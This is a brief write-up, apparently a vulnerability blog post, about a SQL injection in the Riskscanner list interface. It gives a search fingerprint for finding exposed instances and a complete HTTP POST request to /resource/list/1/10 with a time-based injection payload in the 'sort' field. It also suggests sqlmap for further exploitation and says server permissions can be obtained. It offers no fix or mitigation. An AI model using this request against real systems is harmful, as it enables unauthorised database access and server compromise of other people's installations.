Riskscanner List Sql Injection Vulnerability
Riskscanner List Sql Injection Vulnerability
Riskscanner list SQL injection vulnerability
Vulnerability Description
The Riskscanner list interface has a SQL injection vulnerability, and server permissions can be obtained through the vulnerability.
Vulnerability Impact
Riskscanner
Network surveying and mapping
title=”Riskscanner”
Vulnerability reappears
Login page
Send vulnerability request packets
POST /resource/list/1/10 HTTP/1.1
Host:
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/json;charset=UTF-8
{"sort":"1)a union select sleep(5) -- -"}
Using the tool Sqlmap
This post is licensed under CC BY 4.0 by the author.